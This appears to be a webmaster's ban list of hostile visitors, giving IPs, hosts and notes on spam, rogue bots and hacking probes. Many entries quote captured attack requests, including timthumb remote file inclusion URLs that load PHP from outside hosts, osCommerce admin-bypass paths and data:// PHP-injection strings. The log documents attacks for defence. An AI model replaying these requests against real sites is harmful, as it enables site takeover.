93.166.121.107 Host: Denmark Tranbjerg Tdc A/s Spam harvester, comment spammer
Looking for indexes – URLindex.php
High threat rating in Project Honeypot recordes
68.224.11.51 Hostname: ip68-224-11-51.lv.lv.cox.net
Host: United States – Las Vegas Cox Communications
Spammer
Also looking for exploit possibilities
/137501635951f515a72dfca.php
/product_info.php
/shopping_cart.php
/137501636951f515b145ae8.php
/137501636551f515add822d.php
198.2.203.16 Host: China Guangzhou Lcc
PEGTECHINC – PEG TECH INC
Comment spammer
Bad host
189.186.210.208 Hostname: dsl-189-186-210-208-dyn.prod-infinitum.com.mx
Host: Mexico – Mexico City Gestion De Direccionamiento Uninet
Comment spammer
208.177.76.15 Hostname: 208.177.76.15.ptr.us.xo.net
Host: United States – Herndon Xo Communications
Comment spammer
Bad host
94.27.95.129 Hostname: SOL-FTTB.129.95.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
59.42.47.43 Host: China – Guangzhou No.17 Jiao Chang Xi Road Guangzhou China
Web server: 1 website – zyaj168.com
Comment spammer
192.119.151.155 Host: United States – Dallas Avante Vps Comment spammer
Hijacked browser UA: Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
86.169.159.173 Hostname: host86-169-159-173.range86-169.btcentralplus.com
Host: United Kingdom – Manchester Bt Public Internet Service
Comment spammer
Mail server
88.216.112.67 Hostname: 173-231-10-35.hosted.static.webnx.com
Host: Lithuania – Vilnius Uab Nacionalinis Telekomunikaciju Tinklas
Shared hosting server: 30 websites
Hacker – Looking for database backups –
/admin/backup/
/backup/
/backups/
192.99.2.63 Hostname: ns4009078.ip-192-99-2.net
Host: Canada – Montreal Ovh Hosting Inc.
Comment spammer
Looking for indexes – index.php
Bad host: Montreal OVH
82.193.120.55 Hostname: 82.193.120.55.ipnet.kiev.ua
Host: Ukraine – Kiev Zat Industrial Media Network
Comment spammer
Bad host
181.48.27.242 Host: Colombia – Bogota Telmex Colombia S.a. Remote File Inclusion probe / WordPress timthumb RFI exploit:
/wp-content/themes/patientpuptraining/thumb.php?
src=http: //picasa.com.kakaespetos.com.br/bad.php
89.72.218.213 Hostname: 89-72-218-213.dynamic.chello.pl
Host: Poland – Warsaw Upc Polska Sp. Z O.o.
Looking or wp-signup
Suspicious UA: Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0 2013-07-27 07:37:08
That’s not any browser agent I know of.
192.3.141.125 Hostname: host.colocrossing.com
Host: United States – Buffalo Colocrossing
Brute force exploit attempt looking for wpOnlineStore/osCommerce/Zencart vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
63.235.155.210 Hostname: 63-235-155-210.dia.static.qwest.net
Host: United States – San Mateo Terarecon Inc.
Trying to register
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
190.204.106.61 Hostname: host6.server11.vpn999.com
Host: Venezuela, Bolivarian Republic – Of Caracas Cantv Servicios Venezuela
Comment spammer
96.127.166.83 Hostname: host6.server11.vpn999.com
Host: United States – Chicago Singlehop Inc.
Web server: 1 website – bookssquad.com
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
Bad host: Chicago Singlehop
39.189.4.106 Host: China – Beijing China Mobile Communications Corporation Comment spammer
83.146.71.64 Host: Russian Federation – Chelyabinsk Southern Urals Transtelecom Zao Comment spammer
142.0.34.166 Host: United States – Scranton Volumedrive Comment spammer
Trying to post content – node/add
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
173.231.10.35 Hostname: 173-231-10-35.hosted.static.webnx.com
Host: United States – Los Angeles Webnx Inc
Shared hosting server: 1998 websites
Looking for exploit vulnerability
208.73.23.78 United States – Baltimore Reliable Hosting Services Hacker looking for vulnerable files:
/wp-content/plugins/wp_api/mod_system.php
185.8.22.235 Hostname: 53.hosted.kode.ro
Host: Russian Federation – Stavropol’ Ooo Set
Looking for known Apache .svn directory vulnerability
/.svn/text-base/index.php.svn-base
74.221.217.130 Host: United States – Seattle Dme Hosting Llc Comment spammer
Trying to register: /?q=user
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
Hijacked browser UA:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET
CLR 1.1.4322; PeoplePal 6.2)
79.5.54.133 Hostname: host133-54-static.5-79-b.business.telecomitalia.it
Host: Italy – Roma Telecom Italia Net
Trying to access site admin
/admin.php
/wp-login.php
/administrator/index.phpTrying to register
/?q=user
85.204.235.53 Hostname: 53.hosted.kode.ro
Host: Romania – Bucharest Sc Mediasat Srl
Comment spammer
Trying to register
91.220.43.21 Hostname: SOL-FTTB.232.74.27.94.sovam.net.ua
Host: Latvia – Riga Energy.lv Sia
Looking for wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/administrators.php/login.php
94.27.74.232 Hostname: SOL-FTTB.232.74.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
88.190.240.66 Hostname: 88-190-240-66.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
88.190.241.111 Hostname: 88-190-241-111.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
94.23.118.179 Host: Italy – Trieste Ovh Systems Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
2nd UA seen contains hijacked Browser UA string: “FunWebProducts”
66.248.193.125 Host: United States – Dallas Toby Pillinger Comment spammer
88.190.241.38 Hostname: 88-190-241-38.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
Bad host
193.111.141.52 Hostname: t052.topaz.fastwebserver.de
Host: Germany – Dusseldorf Interprovider Ltd
Rule breaker – ignores robots.tx
Malicious user agent – MJ12bot
Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
87.68.68.58 Hostname: 87.68.68.58.cable.012.net.il
Host: Israel – Tel Aviv 012 Smile Communications Ltd.
Mail server
multiple requests from same URL with 4 different user agents
Honeypot records show IP belongs to bad host
94.228.34.203 Host: United Kingdom – Byfleet 4d Data Centres Ltd Spy bot – magpie-crawler
UA: magpie-crawler/1.1 (U; Linux amd64; en-GB;
+http: //www.brandwatch.net)
88.190.241.198
88.190.241.178
Hostname: 88-190-241-198.rev.dedibox.fr
Host: France – Nantes Free Sas
Comment spammer
Bad host
65.49.14.148 Host: United States – Cheyenne Sophidea Inc. Comment spammer
198.167.136.247 Host: United States – Kansas City Dnsslave.com Comment spammer
94.27.94.170 Hostname: SOL-FTTB.170.94.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
Bad host
137.175.68.177 Host: United States – Sunnyvale Peg Tech Inc Comment spammer
Bad host
212.109.32.11 Hostname: SOL-FTTB.217.65.27.94.sovam.net.ua
Host: Ukraine – Kiev Corenet: Staff Subnet
Shared hosting server: 75 websites
Comment spammer
198.204.226.194 Comment spammer
Bad host
119.205.213.20 Host: Korea, Republic Of – Seoul Korea Telecom Looking for Joomla JCE editor Remote file inclusion (RFI) exploit vulnerability
/&sa=&ei=kvjvUcCABIK44ASLz4HgDA&ved=0CJJCwYBE2%AIpma6C3Busg=
AFQjCNH1NynPtLfaBhB-zygfCyIBwmMC-Q/images/stories/3xp.php
67.202.113.168 Hostname: ip168.67-202-113.static.steadfastdns.net
Host: United States – Chicago Steadfast Networks
Comment spammer
tried to add new content item
/node/add
208.177.72.32 Hostname: 208.177.72.32.ptr.us.xo.net
Host: United States – Herndon Xo Communications
Comment spammer
Bad host
94.27.65.217 Hostname: SOL-FTTB.217.65.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment spammer
192.157.201.10 Hostname: 10.201-157-192.rdns.scalabledns.com
Host: United States – Los Angeles Enzu Inc
Comment spammer
193.28.178.61 Host: United Kingdom – Hamilton Ebay Inc. Hackerbot – Probing for Magento scripts
/js/mage/cookies.js
85.214.151.120 Hostname: h1905547.stratoserver.net
Host: Germany – Berlin Strato Ag
Shared hosting server: 74 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/Quadro/timthumb.php?src=http
%3A%2F%2Fflickr.com.mehtermarsi.org%2Fjhr.php
72.3.236.86 Hostname: s89196.seo-cms.com
Host: United States – Dallas Rackspace Host Routes
Shared hosting server: 9 websites
Looking for wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
92.105.141.171 Hostname: 171-141.105-92.cust.bluewin.ch
Host: Switzerland – Zurich Bluewin Is An Lir And Isp In Switzerland.
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
58.17.213.60 Host: China – Chongqing China Unicom Chongqing Province Network Comment Spammer
94.27.82.174 Hostname: SOL-FTTB.174.82.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
92.162.153.159 Hostname: AToulouse-556-1-169-159.w92-162.abo.wanadoo.fr
Host: France – Toulouse France Telecom S.a.
Rule breaker
Tried to crawl several hundred pages – adding non-existent terms to URL
68.68.96.128 Host: United States – Fremont Active Media Comment Spammer
172.245.32.136 Hostname: host.colocrossing.com
Host: United States – Elk Grove Village New Wave Netconnect Llc
Trying to create account
/?q=user/register – Repetitive attempts
50.115.171.41 Host: United States – Sunnyvale Peg Tech Inc Trying to create account
/?q=user/register – Repetitive attempts
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
188.163.5.0 Hostname: SOL-FTTB.0.5.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Unidentified bot – read robots.txt then proceeded to crawl disallowed files
UA: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
137.175.118.97 Host: United States – Sunnyvale Peg Tech Inc
PEGTECHINC – PEG TECH INC
Comment Spammer
Found honeypot trap file
58.49.30.118 Hostname: 118.30.49.58.broad.wh.hb.dynamic.163data.com.cn
Host: China – Wuhan Chinanet Hubei Province Network
Brute force /dictionary attack looking for known vulnerable registrations scripts
/tiki-register.php
Filled up 1000 entries in activity log in 5 minutes
85.114.136.138 Hostname: web.dawn-server.de
Host: Germany – Koeln Sk-gaming Via Gamed.de Gameserver
Shared hosting web server – 204 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
188.163.5.146 Hostname: SOL-FTTB.146.5.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
188.163.13.209 Hostname: SOL-FTTB.209.13.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
184.72.6.38 Hostname: ec2-184-72-6-38.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon Technologies Inc.
Rule breaker – ignores robots.txt
Nuisance bot: UnwindFetchor/1.0
User Agent: UnwindFetchor/1.0 (+http: //www.gnip.com/)
74.112.131.242
74.112.131.244
Hostname: cc002.topsy.com
Company: United States – San Francisco Topsy Labs Inc.
Butterfly/1.0 bot. This is not a valid search engine spider
User Agent: Mozilla/5.0 (compatible; Butterfly/1.0; +http: //labs.topsy.com/butterfly/) Gecko/2009032608 Firefox/3.0.8
54.241.198.78 Hostname: ec2-54-241-198-78.us-west-1.compute.amazonaws.com
Host: United States – San Francisco Amazon Technologies Inc.
Rule breaker – ignores robots.txt
Nuisance bot: UnwindFetchor/1.0
User Agent: UnwindFetchor/1.0 (+http: //www.gnip.com/)
94.27.67.20 Hostname: SOL-FTTB.20.67.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
85.25.134.59 Hostname: bravo952.startdedicated.com
Host: Germany – Hurth Intergenia Ag
Banned User agent –
NCBot (http: //netcomber.com : tool for finding true domain owners) Queries/complaints: bot@netcomber.com
Listed as mai server and comment spammer
106.81.22.8 Host: China – Chongqing Chinanet Chongqing Province Network Hotlinker – using resources to serve images embedded.
94.102.9.79 Hostname: falcon893.startdedicated.com
Host: Turkey – Izmir Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Shared hosting web server – 5 websites
Hacker:
Probing for exploit vulnerabilities:
//wp-includes/wp-script.php
//wp-includes/wp-services.php
//wp-includes/class-wp-customize-client.php
//thumb_editor.php
//logx.txt
//wp-includes/jahat.php
//wp-content/uploads/images.php
199.217.117.52 Hostname: falcon893.startdedicated.com
Host: United States – New York City Hosting Solutions International Inc.
Shared hosting web server – 73 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/patientpuptraining/thumb.php?src=http%3A%2F%2Fpicasa.com.restorationcontractors.ca%2Fprolink.php
89.39.174.13 Hostname: cpanel1.thinkmedia.ro
Host: Romania – Bucharest Sc Ava Telecom International Srl
Shared hosting web server – 22 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.56.193.74 Hostname: 74.193-56-198.rdns.scalabledns.com
Host: United States – Los Angeles Enzu Inc
Comment Spammer
188.163.4.157 Hostname: SOL-FTTB.157.4.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
173.232.7.116 Host: United States – Kirkland Cybergate Web Solutions Comment Spammer
68.68.96.11 Host: United States – Fremont Active Media Comment Spammer
23.22.200.190 Hostname: ec2-23-22-200-190.compute-1.amazonaws.com
Host: United States – Ashburn Amazon.com Inc.
Comment Spammer
198.204.226.210 Host: United States – Kansas City Zhou Pizhong Comment Spammer
Bad host
137.175.1.235 United States – Sunnyvale Peg Tech Inc
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
62.87.191.89 Hostname: dynamic-62-87-191-89.ssp.dialog.net.pl
Host: Poland – Wroclaw Dynamic Broadband Services
Comment Spammer
Bad host
50.115.173.24 Company: United States – Kansas City Dnsslave.com
VIRPUS – DNSSLAVE.COM
Comment Spammer
188.163.14.5 Hostname: SOL-FTTB.5.14.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
192.74.232.129 Company: United States – San Jose Jiusutechnology Limited Liability Company
PEGTECHINC – PEG TECH INC
Comment Spammer
Bad host
94.27.77.240 Hostname: SOL-FTTB.240.77.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
188.163.10.106 Hostname: SOL-FTTB.106.10.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
37.1.251.117 Hostname: rev-117-251-20.isp3.alsatis.net
Company: France – Ramonville-saint-agne Sas Alsatis
Some sort of badly scripted bot.
Looked for several hundred pages using badly formed links
190.248.139.18 Hostname: cable190-248-139-18.une.net.co
Company: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Web server – 1 website – contraloriadecundinamarca.gov.co
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/%20/timthumb.php?src=http
%3A%2F%2Fflickr.com.5paie.com%2Fstunx.php
198.74.231.14 Hostname: host388.hostmonster.com
Company: United States – Provo Unified Layer
Shared hosting web server – 1416 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/headlines/thumb.php?src=http:
//flickr.com.golfpops.com/good.php
/&sa=U&ei=oUvqUeHLBIXAigL6vICgCQ&ved=
0CCIQFjAC&usg=AFQjCNGCBxNGO5UOCJredTHWtzRmds5HBA
/wp-content/themes/headlines/thumb.php?src=http:
//flickr.com.golfpops.com/good.php
Probably a hacked website
198.74.231.14 Company: United States – Halethorpe Commercial Media Corporation Malicious user agent – MJ12bot
Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
95.181.60.106 Host: Russian Federation – Kemerovo E-light-telecom Base 64 hacker attack
DOMAIN ROOT /?_SERVER[DOCUMENT_ROOT]=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK?User agent:
Mozilla/4.0 (compatible; Synapse)”>Mozilla/4.0 (compatible; Synapse)
50.115.173.137 Company: United States – Kansas City Alexe Marian-marius Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
207.34.25.76 Hostname: relay0.radian6.com
Host: Canada – Halifax Fast Lane Technologies
Spybot, webscraper
Rule breaker – never gets robots.txt
UA: R6_FeedFetcher(www.radian6.com/crawler)
37.18.152.166 Hostname: SOL-FTTB.77.66.27.94.sovam.net.ua
Host: Russian Federation – Stavropol’ Ooo Set Network
Looking for vulnerabilities
DOMAIN/.svn/text-base/index.php.svn-base
216.244.85.235 Company: United States – Seattle Private Customer Comment Spammer
94.27.66.77 Hostname: SOL-FTTB.77.66.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
192.95.18.117 Company: United States – Newark Ovh Comment Spammer
188.163.15.103 Hostname: SOL-FTTB.103.15.163.188.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
142.91.79.28 Hostname: 142.91.79.28.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment Spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
89.70.240.251 Hostname: 89-70-240-251.dynamic.chello.pl
Host: Poland – Warsaw Upc Polska Sp. Z O.o.
Comment Spammer
94.23.118.176 Host: Italy – Trieste Ovh Systems Trying to login/register
Trackback spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
94.27.66.203 Host: Ukraine – Kiev Golden Telecom Comment Spammer
88.170.8.1 Hostname: vif38-1-88-170-8-1.fbx.proxad.net
Host: France – Vif Free Sas
Rogue bot
Crawled site – looking for very old links
62.122.240.204 Hostname: ip-62.122.240.204.zelenaya.net
Host: Russian Federation – Saint Petersburg Ooo Set
Looking for vulnerabilities
DOMAIN/.svn/text-base/index.php.svn-base
116.1.103.246 Host: China – Nanning Chinanet Guangxi Province Network Comment Spammer
216.244.78.26 Host: United States – Seattle Mattarsoft.com.sa Comment Spammer
94.27.70.61 Hostname: SOL-FTTB.61.70.27.94.sovam.net.ua
Host: Ukraine – Gnedin Golden Telecom
Comment Spammer
65.254.53.238 Hostname: clone.powercode.com
Host: United States – Atlanta Global Net Access Llc
Web server – 14 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Specifically looking for wpOnlineStore installations
108.62.71.154 Hostname: static-108-62-71-154.nextroute.co
Host: United States – Chicago Ubiquity Server Solutions Chicago
Comment Spammer
81.169.136.87 Hostname: h1648772.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server – 1 website: brookpacelascelles.de
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
199.187.122.9 Host: United States – Philadelphia Mystik Media
Web server – 1 website: sheerexplorer.com
Malicious bot. Has several user agents – including faked googlebot ID
Scans site at high rate. Seems to get URLs from old archives and RSS feeds
Throws in registration urls e.g. /signup?context=webintent
Host – Mystik Media – considered malicious and all IPs banned
78.177.37.126 Hostname: 78.177.37.126.dynamic.ttnet.com.tr
Host: Turkey – Bursa Turk Telekomunikasyon Anonim Sirketi
Hacker – trying to login / access site admin
/wp-login.php
/administrator/index.php
/admin.php
/bitrix/admin/index.php?lang=en
/admin/login.php
/admin/
98.100.226.10 Host: United States – Green Bay Time Warner Cable Internet Llc Ezine Scanner bot
Bot never gets robot.txt
UA Mozilla/5.0 (textmode; U; Linux i386; en-US; rv:3.0.110.0) Gecko/20101006 EzineArticlesLinkScanner/3.0.0g
89.31.73.1 Host: Italy – Florence Genesys Informatica Srl Rogue bot – Rule breaker.
Never read robots.txt
Crawled entire site at high rate
59.57.14.116
59.57.14.92
Host: China – Fuzhou Chinanet Fujian Province Network Comment Spammer – found honeypot trap file
184.173.128.207 Hostname: 184.173.128.207-static.reverse.softlayer.com
Host: United States – Washington Theplanet.com Internet Services Inc.
Web server – 2 websites: quickmobile.com.br , yasaminkiyisinda.com
Looking for non-existent files
80.241.220.245 Hostname: vps2p.blooweb.net
Host: Germany – Muenchen Contabo Gmbh
Web server – 13 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
59.60.115.224 Host: Korea, Republic Of – Seoul Lg Dacom Kidc Comment Spammer
110.45.145.214 Host: China – Fuzhou Chinanet Fujian Province Network Hacker:1. Remote PHP file inclusion attempt.
//wp-content//themes/freely/admin/extensions/timthumb.php?src=http:
//przemeksaracen.pl/load.php2. Probing for various exploit vulnerabilities:
//wp-includes/wp-script.php
//wp-includes/wp-services.php
//wp-includes/class-wp-customize-client.php
//thumb_editor.php
//logx.txt
//wp-includes/jahat.php
//wp-content/uploads/images.php
108.62.71.63 Hostname: static-108-62-71-63.nextroute.co
Host: United States – Chicago Ubiquity Server Solutions Chicago
Nobis Technology Group, LLC
Trying to register/login
Direct access – No other page loaded
139.194.54.39 Hostname: fm-dyn-139-194-54-39.fast.net.id
Host: Indonesia – Jakarta Pt. First Media Tbk
Comment Spammer
94.27.69.95 Hostname: SOL-FTTB.95.69.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
94.27.71.95 Hostname: SOL-FTTB.95.71.27.94.sovam.net.ua
Host: Ukraine – Kiev Golden Telecom
Comment Spammer
94.27.68.174 Hostname: www11363ue.sakura.ne.jp
Host: Ukraine – Gnedin Golden Telecom
Comment Spammer
78.97.222.201 Host: Romania – Bucharest Upc Romania Cluj Comment Spammer, dictionary attacker, mail server
49.212.149.137 Hostname: www11363ue.sakura.ne.jp
Host: Japan – Tokyo Sakura Internet Inc.
Web server – 1 website: katsu757.net
Comment Spammer
85.195.121.2
85.195.124.182
Host: Germany – Hanau Am Main Velia.net Internetdienste Gmbh Comment Spammer
188.163.7.241 Hostname: SOL-FTTB.241.7.163.188.sovam.net.ua
Company: Ukraine – Kiev Golden Telecom
Comment Spammer
173.192.79.101 Hostname: 173.192.79.101-static.reverse.softlayer.com
Company: United States – Dallas Softlayer Technologies Inc.
Nuisance bot: ShowyouBot
User Agent: ShowyouBot (http: //showyou.com/crawler)
Grabs links form new Twitter posts – It’s not the Twitter bot – Ban it
Bad host – Softlayer Technologies
184.72.6.3 Hostname: ec2-184-72-6-38.us-west-1.compute.amazonaws.com
Company: United States – San Francisco Amazon.com Inc.
Nuisance bot: UnwindFetchor/1.0
User Agent: UnwindFetchor/1.0 (+http: //www.gnip.com/)
Grabs links form new Twitter posts – It’s not the Twitter bot – Ban it
74.112.131.246 Hostname: cc006.topsy.com
Company: United States – San Francisco Topsy Labs Inc.
Butterfly/1.0 bot. This is not a valid search engine spider
User Agent: Mozilla/5.0 (compatible; Butterfly/1.0; +http: //labs.topsy.com/butterfly/) Gecko/2009032608 Firefox/3.0.8
86.194.209.93 Hostname: AClermont-Ferrand-552-1-246-93.w86-194.abo.wanadoo.fr
Company: France – Clermont France Telecom S.a.
Suspicious user agent: rarely used
94.228.34.203 Company: United Kingdom – Byfleet 4d Data Centres Ltd Spybot – magpie-crawler – belongs to brandwatch.net
Rule breaker – ignores / never gets robots.txt
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http: //www.brandwatch.net)
64.191.55.104 Hostname: sunlessn.dbloproject3.com
Company: United States – Scranton Network Operations Center Inc.
Web server – 1 website: pensjonat-delfin.com.pl
Trying to register account
93.74.42.136 Hostname: breakfastness.analogy.volia.net
Company: Ukraine – Kiev Kyivski Telekomunikatsiyni Merezhi Llc
Trying to register account
209.114.36.45 Hostname: 209-114-36-45.static.cloud-ips.com
Company: United States – Dallas Rackspace Hosting
Embed.ly Crawler
Commercial content scraper, rule breaker – ignore robots.txt
67.222.144.25 Hostname: ggs-t.ggs-t.com
Company: United States – Dallas Dfw Datacenter
Shared hosting server – 374 websites
Hacker activity – Remote PHP file inclusion attempt.
trying to exploit known phpProfiles vulnerability
DOMAIN/Full_Release/include/body_comm.inc.php?content=data:
,%3C?php%20print-439573653*57;%20?%3E
85.25.243.224 Hostname: puck361.server4you.de
Company: Germany – Berlin Intergenia Ag
Shared hosting server – 59 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/headlines/thumb.php?src=http %3A%2F%2Fwww. picasa.com.kennethholland.com%2F.log%2Fupload7.php
37.59.150.100 Company: France – Roubaix Ovh Systems Brute forcee / Dictionary attack attempt to register on site
Bad host – Roubaix Ovh
142.54.187.122 Company: United States – Kansas City Zhou Pizhong Brute force / Dictionary attack on forum signup/login using multiple common
login / signup paths
Bad host – Zhou Pizhong
173.234.196.251 Company: United States – Chicago Ubiquity Server Solutions Chicago
Web server – 1 website: zhoutang.com
Comment Spammer
Using a spambot hosted on this server
50.115.170.232 Company: United States – Kansas City Virpus Networks
Web server – 1 unidentified website
Comment Spammer
Using a spambot hosted on this server
173.212.224.84 Hostname: ns2.fast-cash4u.info
Company: United States – Las Vegas Pvnt Networks
Web server – 1 website: pointofnext.com
Comment Spammer
Using a spambot hosted on this server
83.152.212.105 Hostname: gov91-4-83-152-212-105.fbx.proxad.net
Company: France – Gargenville Online S.a.s.
Some sort of bot
Looked for existing content using faulty URLS
91.221.70.208 Hostname: server.semmant.ru
Company: Russian Federation – Moscow Averkiev Alexey Anatolyovich
Shared hosting server – 39 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.95.0.186 Hostname: loopip.com
Company: United States – San Francisco Comcast Business Communications Llc
Web server – 1 website: incywincy.com
Banned for adding > to end of URLS
142.0.32.6 Hostname: The.Easiest.The.Best.VPSInfinity.com
Company: United States – Scranton Volumedrive
Comment spammer
71.199.48.67 Hostname: c-71-199-48-67.hsd1.ut.comcast.net
Company: United States – Salt Lake City Comcast Cable Communications Ip Services
Comment spammer
162.211.121.206 Company: United States – Lewes Ilika.net Llc Comment spammer
88.80.20.197 Hostname: host-88-80-20-197.cust.prq.se
Company: Sweden – Stockholm Periquito Ab
Comment spammer
184.7.94.231 Hostname: fl-184-7-94-231.dhcp.embarqhsd.net
Company: United States – Fort Myers Embarq Corporation
Comment spammer
74.221.211.119 Company: United States – Seattle Dme Hosting Llc.
Website server: 1 website: howtocleancar.com
Comment spammer
Malicious user agent:
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
88.190.16.36 Hostname: sd-28013.dedibox.fr
Company: France – Lyon Free Sas
Comment spammer
88.190.47.232 Hostname: 88-190-47-232.rev.dedibox.fr
Company: France – Lyon Free Sas
Comment spammer
88.190.61.98 Hostname: 88-190-61-98.rev.dedibox.fr
Company: France – Paris Free Sas
Comment spammer
88.190.61.96 Hostname: 88-190-61-96.rev.dedibox.fr
Company: France – Paris Free Sas
Comment spammer
49.212.149.137 Hostname: www11363ue.sakura.ne.jp
Company: Japan – Tokyo Sakura Internet Inc.
Website server: 1 website: katsu757.net
Comment spammer
98.126.218.88 Company: United States -Orange Krypt Technologies
Shared hosting server: 4 websites: 84i6.asia , 87jn.asia , 8aak.asia , 8jf8.asia
Comment spammer
198.2.203.5
198.2.203.12
Company: China – Guangzhou Lcc
PEGTECHINC – PEG TECH INC
Comment spammer, Bad host
199.48.254.170 Hostname: server5.nbtus.com
Company: United States Novi Vps Datacenter Llc
Shared hosting server: 63 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
URL&sa=U&ei=WwzdUbWLF9KCrQHsxIHwAg&ved=
0CJ8CEBYwUThk&usg=AFQjCNFTYwvFkHccfNBoBu8lQqHe7-
HB7g/admin/banner_manager.php/login.php
89.218.94.163 Company: Kazakhstan – Astana Ao Nacional Centr Mat Det Comment spammer
64.213.148.131 Company: United States – Broomfield Level 3 Communications Inc. Comment spammer
192.74.234.70 Company: United States – San Jose Feng Chen
PEGTECHINC – PEG TECH INC
Comment spammer
137.175.105.33 Company: United States – Columbus Xlhost.com Inc
PEGTECHINC – PEG TECH INC
Comment Spammer
207.182.144.38 Hostname: 26.90.b6.static.xlhost.com
Company: United States – Columbus Xlhost.com Inc
Comment Spammer
190.203.101.65 Hostname: 190-203-101-65.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Trying to login/register
